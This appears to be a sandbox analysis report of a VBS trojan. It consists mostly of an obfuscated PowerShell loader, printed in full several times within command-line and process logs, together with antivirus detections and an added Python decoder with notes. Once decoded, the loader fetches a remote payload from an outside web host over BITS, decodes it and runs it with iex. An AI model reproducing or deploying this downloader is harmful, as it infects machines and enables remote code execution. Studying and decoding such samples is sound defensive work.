denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
cmdline powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
wmi select * from win32_process where ProcessId=2752
wmi Select * from Win32_Service
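The PowerShell command line above is a string-stripping loader: Cintereye9 keeps every fifth character of each literal (starting at index 4 and stopping before the last index), and each decoded fragment is dot-sourced through $Iongitr01, whose own literal decodes to iex. The Python below is an added example, not part of this report and not the sample's code, that ports the decoder and runs it over the first five literals copied verbatim from the cmdline entry above. The regular expression, the intact() check and the function names are mine; the only thing taken from the sample is the stride-5 loop.

```python
from __future__ import annotations
import re

# Port of the Cintereye9 function from the sandboxed command line:
#   For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){ ... substring($Knack, 1) ... }
# Every real character is preceded by four junk characters; the final character is never read.
def cintereye9(s: str) -> str:
    return "".join(s[i] for i in range(4, len(s) - 1, 5))


# Cheap integrity check: an intact literal is a whole number of 5-character groups.
# HTML rendering collapses runs of spaces, so a literal copied from a web view may have lost
# characters; the stride then drifts and the decoded text turns to junk after the lost space.
def intact(s: str) -> bool:
    return len(s) % 5 == 0


# Every literal handed to the decoder, in order of appearance (regex is my addition).
LITERAL = re.compile(r"Cintereye9\s+'([^']*)'")


def decode_all(script: str) -> list[tuple[str, bool]]:
    """Return (decoded, intact) for each Cintereye9 '...' argument found in the script."""
    return [(cintereye9(m.group(1)), intact(m.group(1))) for m in LITERAL.finditer(script)]


# Sample input: the first five decoder calls, copied verbatim from the report's cmdline entry.
SAMPLE = r"""$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;"""


if __name__ == "__main__":
    for decoded, ok in decode_all(SAMPLE):
        print(("    " if ok else "??? ") + decoded)
```

Read the output as the script the loader actually runs: `.($Iongitr01) (Cintereye9 '...')` is `. iex '<decoded>'`, so each decoded line is a statement. The second literal is `iex`, the fourth sets $Gibbesvig2 to $env:windir, and the fifth prefixes $Rush with it, which is the interpreter path the `if ($Terrapins) {.$Rush $Ekso;}` branch re-launches with. Decode from the raw .vbs or the process's captured command line rather than from a rendered report page: any literal that fails intact(), or whose output stops reading as PowerShell part-way through, has lost whitespace in rendering.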
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
filepath: powershell
1 1 0
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.VBS.SAgent.gen
Avira VBS/Agent.bpv
ZoneAlarm HEUR:Trojan.VBS.SAgent.gen
Microsoft Trojan:Script/Wacatac.H!ml
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
parent_process wscript.exe martian_process powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' 
Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
